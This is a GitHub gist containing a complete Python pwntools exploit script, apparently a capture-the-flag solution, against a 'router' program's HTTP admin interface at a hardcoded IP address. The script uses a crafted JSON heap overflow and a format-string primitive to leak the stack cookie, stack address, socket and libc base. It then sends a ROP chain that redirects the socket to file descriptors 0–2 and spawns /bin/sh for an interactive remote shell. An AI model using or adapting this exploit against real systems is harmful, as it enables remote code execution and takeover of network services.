Skip to content

Instantly share code, notes, and snippets.

@bennofs
Created October 8, 2017 16:10
Show Gist options
  • Save bennofs/cce01eefbaa4a80a59910b87478fb366 to your computer and use it in GitHub Desktop.
Save bennofs/cce01eefbaa4a80a59910b87478fb366 to your computer and use it in GitHub Desktop.
#!/usr/bin/env python2
from pwn import *
exe = context.binary = ELF("./router")
libc = ELF("./libc.so") if args.REMOTE else exe.libc
got_end_chunk = 0x60f185
data_offset = 0x10 + 1
def heap_overflow(target_chunk, target_size, data, json="", p=False):
conn = remote("51.15.88.183", 8080) if args.REMOTE else remote("localhost", 8080)
if p:
pause()
filler = 0x50 if target_size != 0x50 else 0x40
objsize = "o" * 0x20
small1 = "x" * 0x10
small2 = "c" * (filler - 0x10)
small3 = "d" * (target_size - 0x10)
overflow = small2.replace("c", "e")[:-1] + "\x7f" + fit({
0x8: target_size | 0x1,
0x10: target_chunk,
})
write_nothing = "\ud8ff\uffff"
padding = write_nothing * ((target_size - 0x10) / 10)
padding += "\x7f"
data = padding + data
payload = '''
{ "%(objsize)s": "%(objsize)s"1
0: "%(small2)s"
0: "%(small3)s"
0: "%(overflow)s"
"%(small3)s": 0,
0: "%(data)s",
%(json)s
}''' % locals()
request = '''
POST /admin HTTP/1.1
Host: aaa
Content-Type: application/json
Cookie: sessionid=0b71662a3b766be303db07f68a0f497090a7e15060eac6a75aab6643c74b15c9
Content-Length: {}
{}
'''.strip().replace("\n", "\r\n").format(len(payload), payload)
conn.send(request)
return conn
def do_printf(s, arg=0xdeadbeef):
data_start = got_end_chunk + data_offset
data = fit({
(exe.symbols.body_template - data_start): data_start + 0x100,
(exe.symbols.success_settings_saved - data_start): arg,
(exe.symbols.http200ok_content - data_start): data_start + 0x100 - 8,
(exe.symbols.settings_template - data_start): 0x40BEF8,
0x100 - 8: "%2$s\0",
0x100: s + "\0",
})
return heap_overflow(got_end_chunk, 0x70, data, json='''
"ssid": "",
"bssid": "",
"dns": ""
''')
@MemLeak
@context.quiet
def leak(addr):
if addr < 0x400000: return None
if '"' in p64(addr): return None
with do_printf("%sENDOFDATA\n", addr) as c:
return c.recvuntil("ENDOFDATA\n", drop=True) + "\0"
c = do_printf("%19$llx\n")
cookie = int(c.recvline(), 16)
success("stack cookie: %#x", cookie)
c.close()
with do_printf("%22$llx\n") as c:
stack_leak = int(c.recvline(), 16)
success("stack leak: %#x", stack_leak)
with do_printf("%sENDDATA\n", stack_leak + 0x5c) as c:
socket = u32(c.recvuntil("ENDDATA\n", drop=True).ljust(4, "\0"))
success("socket: %d", socket)
libc.address += leak.u64(exe.got.fwrite) - libc.symbols.fwrite
pop_rdi = 0x000000000040a0f3 # pop rdi; ret
pop_rsi = 0x000000000040a0f1 # pop rsi; pop r15; ret
stack_chunk = stack_leak - 0x28
payload = fit({
0x20 - data_offset: [
cookie,
p64(0xdeadba5e),
pop_rdi,
p64(socket),
pop_rsi,
p64(0x1),
p64(0x1),
p64(libc.symbols.dup2),
pop_rdi,
p64(socket),
pop_rsi,
p64(0x2),
p64(0x2),
p64(libc.symbols.dup2),
pop_rdi,
p64(socket),
pop_rsi,
p64(0x0),
p64(0x0),
p64(libc.symbols.dup2),
pop_rdi,
p64(stack_chunk + 0x100),
p64(libc.symbols.system),
pop_rdi,
p64(0x0),
p64(libc.symbols.exit),
],
0x100 - data_offset: "/bin/sh\n\0",
})
with heap_overflow(stack_chunk, 0x40, payload, json= "0: 0") as c:
c.interactive()
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment